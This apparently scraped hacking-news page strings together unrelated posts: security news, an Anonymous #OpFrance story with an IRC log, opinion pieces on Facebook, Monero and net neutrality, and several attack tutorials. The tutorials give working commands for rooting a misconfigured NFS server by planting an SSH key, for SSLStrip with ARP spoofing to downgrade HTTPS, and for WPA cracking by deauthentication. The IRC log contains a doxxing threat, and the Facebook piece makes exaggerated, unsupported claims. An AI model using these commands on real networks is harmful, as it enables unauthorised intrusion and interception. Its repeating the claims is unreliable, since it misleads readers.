Microsoft Patches Windows Vulnerabilities Including (CVE-2018-8611) Kernel Transaction Manager Allowing Elevated Privilege

Microsoft released several year-end December, security updates to patch a total of 39 vulnerabilities in its Windows operating systems and applications—10 of which they rated as critical including (CVE-2018-8611.)

The flaw affects almost all versions of Windows operating system—Windows 7 through Server 2019.

The exploit originally discovered and reported by security researchers at Kaspersky, allows for a zero-day attack exploitation of elevation of privilege (EoP) bug in the Windows Kernel (ntoskrnl.exe.) Exploiting the Windows Kernel could then allow malicious programs to execute their own subjective code with higher privileges on any targeted vulnerable systems.

“This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox,” Kaspersky said.

“Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.”

Another important publicly known vulnerability known as CVE-2018-8517, which is a denial-of-service bug in web applications was also fixed in the update.

“The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application,” Microsoft explains.

Microsoft also patched 10 critical and 29 important vulnerabilities affecting a range of its products, including — Windows, Edge, Internet Explorer, ChackraCore, Office,  Microsoft Office Services and Web Apps, and the .NET Framework responsible for a number of applications.

Users and system administrators alike are strongly recommended to apply the latest security patches as prompted to update, to not risk becoming a slave for a hacker’s botnet. Unless of course, you want to opt for being a target of a hacker or group of hackers.

Then by all means, please keep your system software outdated with these vulnerabilities present including the Kernal bug. Which hackers are going to have a field day with that bug present, just remember you the reader are responsible for all your actions with this information and this is just security education.

For installing the latest security patch updates, go to Settings → Update and Security → Windows Update → then Check for updates, on your computer system or you can install the updates manually.

 

Anonymous Attacks French Government, AnonOps #OpFrance Owner “AnonKiller” Exposed Logging IPs

Anonymous has declared war on the French government after protests have resulted in the bloodshed of protesters. While, one of the main admins named “AnonKiller” on Anon Ops IRC #OpFrance, has been exposed logging IPs in the channel.

Accounts associated with Anonymous, have been seen on Twitter attacking the French government resulting in several cyber attacks including database hacks and DDoS attacks of the French government in support of the Yellow Vests protesters on the ground. Dozens of hacktivists are participating in the operation against the French government codenamed #OpFrance.

A press release for the Anonymous operations against France can be seen below acquired from Anon Files.

According to a thread on Twitter by the same account that posted a hack of Ministry of Defense officials, known to be associated with Anonymous operations CgAn_Doemela, an anon going by “AnonKiller’ is being accused of being a snitch for logging IPs inside IRC.

Although, AnonKiller argues that it’s because the far-right “demos” (demosophy) is involved in the operation against France and the “extreme right cannot reflect the image of Anon.” Others are calling the user a potential informant or provocateur within the collective.

IRC LOGS according to CgAn_Doemela:

**** BEGIN LOGGING AT Sat Dec  8 20:47:11 2018
Dec 08 20:47:11 *        Now talking on #opfrance
Dec 08 20:47:11 *        Topic for #opfrance is: www.facebook.com/AnonFr2.0 // www.anonops.fr // www.twitter.com/AnonFrOfficiel // Nous dementons toute opération dite en notre nom en soutient au mouvement des gillets jaunes!
Dec 08 20:47:11 *        Topic for #opfrance set by anonkiller (Fri Dec  7 09:10:52 2018)
Dec 08 20:48:19 <anonkiller>        hello because this group is orchestrated by the demos, just look at what is being finished
Dec 08 20:48:53 <anonkiller>        the extreme right can not reflect the image of the anon
Dec 08 20:49:17 <anonkiller>        this group is orchestrated by demosophy
Dec 08 20:50:29 <Cogitabundus>        You do realize that calls into question your capacity to run a channel.
Dec 08 20:50:40 <Cogitabundus>        Since we’ve very anti-IP harvesting.
Dec 08 20:50:47 <cookie>        article from 2015 mind you
Dec 08 20:51:29 <anonkiller>        they were identified behind telegram channels and other media
Dec 08 20:53:05 <anonkiller>        I removed the post for ip but you can inquire there demosophy well behind
Dec 08 20:59:05 <anonkiller>        you can also look at their pads, the consistency of the sites listed relative to the target that was determined
Dec 08 20:59:48 <cookie>        so you’re attacking anons because you don’t agree with the targets?
Dec 08 21:01:33 <anonkiller>        no because the extreme right is behind
Dec 08 21:01:54 <anonkiller>        extreme right it’s not anon
Dec 08 21:02:25 <Cogitabundus>        What’s Anon or not isn’t really something easy to determine.
Dec 08 21:02:34 <cookie>        hmmm they may be trying to hide behind anon. but most of those target were chosen by legit anons
Dec 08 21:02:36 <Cogitabundus>        When it’s such a loose thing.
Dec 08 21:02:41 <cookie>        its a coordinated attack
Dec 08 21:05:07 <anonkiller>        legitimate people yes because at the beginning we also help the yellow vests but since the movements of etreme was behind many of their groups, it was released, the fight is part of a fair cause but was diverted and become dangerous
Dec 08 21:05:37 <anonkiller>        I would stay out if you want to do this operation go there but I do not care
Dec 08 21:06:06 <anonkiller>        I prefer to track terrorism, which is a priority for me
Dec 08 21:07:54 <cookie>        so to you the anons on cgan are terrorists?
Dec 08 21:09:14 <anonkiller>        I did not say that
Dec 08 21:09:44 <cookie>        you say you prefer tracking terrorism
Dec 08 21:09:47 <anonkiller>        I said that I do not interfere anymore and that I went back to track terrorists like daesh
Dec 08 21:09:50 <cookie>        and you have screenshots from cgan
Dec 08 21:10:39 <anonkiller>        yes i have a nice screenshot where they talk about demosophy ..
Dec 08 21:11:34 <anonkiller>        but carrefour and saint gobain are government sites for you?
Dec 08 21:12:57 <cookie>        well anyone could make a pad. just because someone is spamming a pad in a channel doesnt mean it is an official target
Dec 08 21:13:07 <cookie>        we keep official things in official/hidden chans
Dec 08 21:16:39 <cookie>        well i gtg more stuff for op; also anonkiller if i find out you’re working with @zataz or @Damien_Bancal for some counter intel shit or for the FR gov. I will stop at nothing to financially fuck you then maybe drop your info for some local angry protestors to pay you a visit. 🙂 dont fuck with Anons kkbye
Dec 08 21:16:47 *        You have left channel #opfrance (Leaving)
**** ENDING LOGGING AT Sat Dec  8 21:16:47 2018

Meanwhile, the user’s Twitter account identified as @AnonOfFrance is calling on Anons to join their discord, which should be done at the sole discretion of the user. While it’s noted that Discord doesn’t log IPs if you choose to enter the server, be aware that malicious users could send – files, [if it’s enabled on the server] Ip logging links such as setup honeypots or use services that allow Ip tracking.

Stay safe, use proper OpSec and make sure you are behind a VPN, spoof your mac address and use TOR and a safe DNS, all that jazz. Remember you are responsible for your own actions. Sail safe.

Hacker Hacks 50,000 Printers For Save PewDiePie Campaign Exposing Dangerous Of Printer Vulns

A bored young hacker known online on Twitter as TheHackerGiraffe has exposed vulnerabilities that could be potentially dangerous for networked printers.

TheHackerGiraffe exploited vulnerabilities in security protocols for internet-connected devices using Shodan to hack into 50,000 exposed printers as part of the “Save PewDiePie” campaign.

According to TheHackerGiraffe, PewDiePie’s world-famous YouTube channel with more than 19 billion views over five years — is set to be distracted by Indian music production channel T-series.

On Sunday, T-Series’ subscriber count came within less than 50,000 of surpassing PewDiePie.

So rather than allow that to happen as a troll, TheHackerGiraffe decided to search Shodan,  a search engine built specifically to find vuInternet-connected devices. Which resulted to his amazement in 800,000 vulnerable printers. Then TheHackerGiraffe downloaded PRET, a tool that would allow him to access files, damage the printer access the internal network and view the printer’s memory.

In a thread, on Twitter, he described his shock at discovering what PRET would allow him do to the printers.

TheHackerGiraffe said:

“PRET had the scariest of features. Ability to access files, damage the printer, access the internal network; things that could really cause damage. So I had to do this, to at least help organisations and people that can protect themselves.”

In the Twitter thread, TheHackerGiraffe revealed that while looking at ways to apply support for PewDiePie (without the streamer’s knowledge or permission of hacking 50,000 printers), he decided to carry out his own guerilla printing campaign using the vulnerable internet-connected printers.

Rather than damage the printers as a blackhat might do for fun, TheHackGiraffe decided to just use his access to print out flyers from the vulnerable printers and print out a message urging people to subscribe to PewDiePie’s channel. He also urged the unsuspecting civilians to unsubscribe from T-Series if they were, with the Youtuber’s signature “brofist” cavitate.

In a video he posted himself about the fight to retain his crown, PewDiePie whose real name is Felix Kjellberg – said he enjoyed the support.

“All of this support to keep me on top is so funny. I love it. Please keep it up,” PewDiePie said.

“But don’t do anything illegal OK… because that will look bad on me,” he added.

TheHackerGiraffe interviewed with The Verge in which he stated what was possible due to the vulnerable printers he found. Which as of this writing is still 800,000 printers.

“Hackers could have stolen files, installed malware, caused physical damage to the printers and even used the printer as a foothold into the inner network,” they said.

“The most horrifying part is I never considered hacking printers before, the whole learning, downloading and scripting process took no more than 30 minutes”, the Hacker told the technology news website TheVerge.

Now imagine what’s possible, if your printer is vulnerable due to open ports, all types of information could be stolen directly from the printer’s memory, malicious software could be installed to log everything printed and much more. The Moral of the story is obviously close your ports. Lucky for victims of this printing campaign the hacker didn’t have a malicious intent.

Exploit a Misconfigured NFS Server | SSH | RPCbind

What NFS Server is ?

NFS is network file system and it is a client server system that allows client to access shared files over a network. It allows client to mount all directories. We are going to access a file system and import our private ssh key to  authorized key file gain root access via SSH. In the last i will tell how to prevent this this type of attacks on your server.

Let the victim ip is 192.168.43.176

open terminal and type rpcinfo -p 192.168.43.176  this will return all the registered RPC programs.

many people get the error that rpcinfo command not found “sudo apt update && sudo apt install rpcbind”

type sudo showmount -e 192.168.43.176 this will return the mount directories.

/ * means root directory
now create a tmp file for mount mkdir /tmp/dir this will create a temporary directory for mount the nfs server, now mount server to temporary directory type command mount -o nolock -t nfs 192.167.43.176:/ /tmp/dir 

now generate ssh key command ssh-keygen that will create a key in your /home/h0nk3r/.ssh/id_rsa

now import the key command cat /home/h0nk3r/.ssh/id_rsa >> /tmp/dir/root/.ssh/authorized_keys that will send your ssh key to the nfs server to gain access to root via ssh now just umount the shared directory umount /tmp/dir 

 

Now You can directly connect to the server type command ssh root@192.168.43.176 

Prevention:

If i am the owner of this server i can manage users with group and with the specific privileges and never use the root directory  as mount point.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.

Create Your Own DarkWeb site | Onion link | Port Forward | Host on WAN

DarkWeb site with tor on linux

DarkWeb is very usefull to be anonymous you can get you own .onion website and host on wide area network free.
i assume you are using kali linux or parrot sec os open terminal and install tor sudo apt-get install tor after you just need to edit some in configuration file of tor.

open terminal and type cd /etc/tor and than ls for list dir you will see torrc file there that you have to edit

open this file in your favorite text editor and add two lines
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 <Your local IP>:80
Check your local ip with ifconfig 
open your file manager with root and go in /var/lib/tor/hidden_service there you get your website
and boom you done it at last start tor by sudo service tor start and sudo service apache2 start

NOTE:- Now you face a problem that site cant be reach! Here is the solution

Forward your port | Go on Internet

This is just make a connection between your local ip to the internet so you can access your website worldwide
for more about Port forwarding click here
i suggest you to use NGROK for download click  available for all Systems
after Download you just forward your port with ./ngrok http 80 80 for http so you apache server will be on WAN and your onion site can reach it.
after forward your port you see like this

just copy 4f28046d.ngrok.io this link and paste where you put your local ip if you remember above
in file torrc  and save it again and restart tor again and now you can access your apache site with onion site
paste your website here  /var/www  and boom your website is ready for share on social media.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.


HTTPS downgrade to HTTP | Bypasss HSTS | SSLStrip | ARP poisoning

Introduction of HSTS, ARP, And sslstrip

HTTP Strict Transport Security (HSTS) is a web security which protects against downgrade of protocols and cookies hijacking. The Address Resolution Protocol (ARP) feature performs a required function in IP routing. ARP finds the hardware address, also known as Media Access Control (MAC) address, of a host from its known IP address. ARP maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM force a web browse to stripping https:// URLs and turning them into http:// URLs.

You have to forward IP By IPTables and send a fake arp request Request.

 

Lets Do it.

MITMF -(Framework for Man-In-The-Middle attacks)

https://github.com/byt3bl33d3r/MITMf  just simple download this Framework from git hub (git clone) or sudo apt-get install mitmf
By just mitmf -h you can go in help section

-i: to specify the interface we want to run the MITM attack trough;
–spoof: to redirect or modify the hijacked traffic;
–apr: to specify that we want to redirect the traffic trough ARP spoofing;
–hsts: to load SSLStrip+ plugin;
–dns: to load a proxy to modify DNS queries;
–gateway: to specify the gateway;
–target:to specify the target.

run mitmf –spoof –arp -i <interface name> –target <target IP> –gateway <gateway IP> –hsts

get the target local ip by netdiscover or scan your local ip by nmap and for gateway ip route, or route –n

SSlStrip

Open terminal and forward Ip by echo 1 > /proc/sys/net/ipv4/ip_forward

start arpspoof by arpspoof -i eth0 -t victimip default_gateway_ip

Setting up port redirection using Iptables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

finally Launch sslstrip sslstrip –l 10000

now open new terminal  and see results tail -n 50 -f sslstrip.log

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.

Hope you had a nice reading, comming back to hacknews.

Why people are deleting their Facebook and you should do the same

If you still own a Facebook account, you are apparently living in the past. After a recent privacy scandal causing 78 million Facebook users to have their private data shared around the world, and abused for political reasons, problems involving the once popular social network are piling up.

The most recent shocking event involves the team of Facebook attempting to convince hospitals to share their patients health information with the site, causing a new outrage among (former) users of the social goliath. Facebook began speaking with hospitals last year about the possibility of matching anonymized user profiles with health data, but the news leaked last week.

Meanwhile a huge online movement called #DeleteFacebook is convincing millions of Facebook victims to delete their accounts and to never come back, something that has caused a loss on the stock market of over 110 billion in value. The movement is active on many locations on the internet and is becoming more popular fast. It is now estimated that at least 1/3 of all individuals active in the tech world have deleted their Facebook or are planning to do this.

The #DeleteFacebook movement suddenly received a big boost, and became a lot larger, when celebrities like Elon Musk, Will Ferrell and Cher attached themselves to it. After whistleblowers like Edward Snowden and Julian Assange expressed their support as well, the cat was out of the bag.

So what are the main reasons you should consider deleting your Facebook account?

1: The social network saves all the images and videos you send on it. Even if it is done in private chats. They then share this content with different companies and partners around the world. This means your private material at this moment could have been watched by millions of people on the planet.

2: Facebook has been caught recording your text messages and your phone calls. They also keep meta data showing exactly who you call, when and for how long, this data includes the full information and phone numbers of your contacts. Even if your contacts are later deleted from your phone, Facebook still records it all. They do the same thing for text messages, logging everything. And again this is shared with all their partners around the world, or pretty much anyone who pays for it.

3: Facebook has been censoring activists, dissidents and hacktivists for years causing it to become a bubble of disinfo and reactionary political speech, where advertisers and media are feeding you with information that is not only destructive for your brain, it also harms your quest for knowledge.

Why should you delete Facebook now instead of trying to change it? The website collected a lot of data about you. The terms and conditions are carefully constructed to make it look like you agree to this. The only option you have now is to delete your account, effectively cancelling your agreement. This means they can no longer sell your data. We believe this is your only option if you want to avoid further damage to your private life.

WIFI Hacking Tutorial: Using Aircrack, DeAuth and Wordlists to hack WIFI networks

Our tutorial today will be about WIFI hacking using the DeAuth attack, most useful for hacking WPA/WPA2 networks. It works by aquiring a handshake and decrypting it using a wordlist.
The system used in the tutorial is Kali linux, but it will work for any .deb based system (Debian, Mint, Ubuntu, etc.) and the technique will not be much different for other distributions either.

1: The tutorial is pretty straightforward, and starts out by putting your network adapter in monitor mode using AIRMON-NG.

2: Next we use AIRODUMP-NG to monitor and receive packets. Your network adapter then receives beacons. This means you get a clear view of all the different WIFI networks around you. After this you select the correct BSSID from the list, and the correct channel.

3: Using AIREPLAY-NG and filling in the correct BSSID and channel, we launch a DeAuth attack using a simple command. Then we wait until a so called “handshake” is received.

4: Close all the processes and start cracking the .cap (capture) file. This will be done using a wordlist. The program used for this is AIRCRACK-NG. Any wordlist saved as a .txt file will do. The bigger the wordlist, the more chance you have of cracking it.

Extra: A good wordlist to use is called the RockYou wordlist, wich is available for download here.

Below is a full tutorial video showing you the exact codes and steps in detail, so you will never make a mistake when you carry out your attack!

With credits to Razzor Sharp for his amazing video!

Why hackers choose Monero instead of Bitcoin

If you haven’t been living beneath a stone for the last few months, then you have heard about Bitcoin too. It started as an internet trend, then it shocked the financial markets, and now even your grandma is buying it. The digital coin is no longer a hype, it became reality and is the first worldwide currency. Globalists love it and hope that soon we will all walk around with a chip in our arm doing fully automated payments. Dystopia is coming and you can be a part of it.

But as the crypto currency Bitcoin is embraced by the “normal” people now, hackers already moved on to the next step. Hackers use Monero. On the Darknet this is the payment method. An entire shadow economy has been created on there, using this specific crypto currency.

Why Monero instead of Bitcoin? There are multiple reasons for this. For one, Monero is anonymous, you won’t see the origin address the funds you receive came from. Where transfers at Bitcoin are transparent, and money transfers can be traced, with Monero they are not.

The second reason is that Monero can actually still be mined. The mining of Bitcoin stopped being profitable years ago. Only big companies or people owning many ASIC miners can still make some income with it, but normal users are no longer mining this coin. However, Monero is a so called CPU coin. The algorithm it uses is called Crytonight, and it is built to be mined with CPU’s (processors).

Where Bitcoin gave an advantage to GPU (graphic card) miners and later ASIC miners, Monero does not. The advantage these people have over CPU miners is minimal. For this reason it is popular among hackers, website owners, but also botnet controllers. Because the more CPU’s you have, the more Monero you will mine. And the Monero coins are, like Bitcoin, increasing in value. Infact, this is going a lot faster than with it’s bigger brother. At the moment we are writing this, the Monero coin is worth around 280 dollars. While a month ago it was worth 28 dollars. So it increased ten fold.

And the third big difference between Bitcoin and Monero is that the latter is not yet influenced by big investors manipulating the market. Due to the anonymous character of the coin it is hard to be used on the speculators market. Because, like we said, it is impossible to trace where transfers come from and where they go to. This doesn’t mean Monero is not being traded. If you believe this, then you have never been on the Darknet.

So what is our conclusion about it? Would we choose Bitcoin or Monero? If you are looking to invest your money and you want to make some real profit? Then go for Monero. If you are looking to use crypto currencies for your daily payments? Then Bitcoin is probably the right choice for you, as it is being accepted more and more by the big stores.

Source: The Internet

How will our lives change when we lose net neutrality?

Net neutrality helps to balance the internet in such a way that internet service providers can’t use the laws to their benefits. This year (2017), a repeal against net neutrality is to be decided upon by the FCC in the United States. The United States is a country where the internet service providers are mostly monopolies created by the government. Therefore, the government, which controls the internet, will be biased in favour of these big businesses. And these businesses, owned by wealthy businessmen, will want to take advantage from removing such regulations and safeguards.

Despite the fact that the FCC in the United States is asking for net neutrality to be gone, the aftermath effects the whole world. The supporters of the repeal against net neutrality spread a list of countries which lack net neutrality in their law, trying to convince the public that even without net neutrality, such countries are doing great in regards to free and cheap internet use.

However, these European countries they keep listing never had a bandwidth or network issue, due to their strong enough internet infrastructure. The United States internet infrastructure, on the contrary, has been like a cheddar cheese. It is exploited by the ISPs to such a degree that the US can’t meet the quotas anymore, since they oversold the lines. Even the public funding that was used by such ISPs on public lands was never returned by these big business owners. Subscriptions were also oversold and all profits went to these companies. All ISPs laid the internet infrastructure with public funding on public land because they were allowed to. And nothing was ever paid back.

As a result, the internet infrastructure of the US was weakened, and will soon be handed over as private property to these ISPs, if they would be succesful at appealing the net neutrality law. This draconian overtake is expected to happen on 14 December 2017.

Without real competition among ISPs, the internet is nothing more than a heavily regulated tool of the elite and the people in power, for controlling news and discourse. Isn’t that what happened with your TV channels as well? Being subjected to the controlling mechanisms of the government, it is now hard to find informative and neutral news or programs and even while more TV channels become available, the price is also increasing and the quality is dropping.

When net neutrality is absent, it is ofcourse unlikely carriers would block entire services from being accessed by their customers because it will harm their business. However, they can use bandwidth throttling, since they will aim to force the users to select the carrier’s preferred alternative, to earn more on the packages they will be selling. If smaller companies wanted a better deal, ISPs like Comcast would ask for fees in exchange for such services.

Such deals will make the services small companies are selling to their customers more expensive, while paying for internet use as one fixed price package will be a thing from the past. Monopolized by the government, ISPs will be able to ask whatever price they want from site owners. Those not able to meet the demands, will see their sites slow down to a degree they can’t reach their followers anymore. In this case, both users and the site owners would have to pay for the services. Users for the internet access, and site owners to make sure the ISPs will not be not slowing down their website speed or the speed at which their videos stream.

In addition, customers will be accessing features like social media through service providers. Such redirected routes will make the internet experience for users complicated, even slower and more expensive.

Bigger companies like Google and Netflix (as they had to pay for Comcast in the past), will be able to pay for the fees ISPs will demand. For small companies, like alternative news sites and personal bloggers (for example, activists), it will be much harder to afford such fees..

ISPs, as big businesses, already have been abusing the internet while working with the government, by functioning as a regulator. Now in the US it will be even easier to block social media and any site unpopular with the big businesses or government. While small companies and a lot of sites all over the world may disappear, the big corporations will control the internet, even growing bigger and now armed with an effective strategy of creating an everlasting monopoly.

Sources:

The inside story of how Netflix came to pay Comcast for internet traffic

https://www.wsj.com/articles/netflix-agrees-to-pay-comcast-to-improve-its-streaming-1393175346

http://viapopuli.com/what-is-net-neutrality-and-why-is-it-important-for-a-free-internet-simplified-version

https://arstechnica.com/tech-policy/2007/08/pearl-jam-censored-by-att-calls-for-a-neutral-net/

http://bsalert.com/news/853/Comcast_Caught_Filtering_Political_E-Mails.html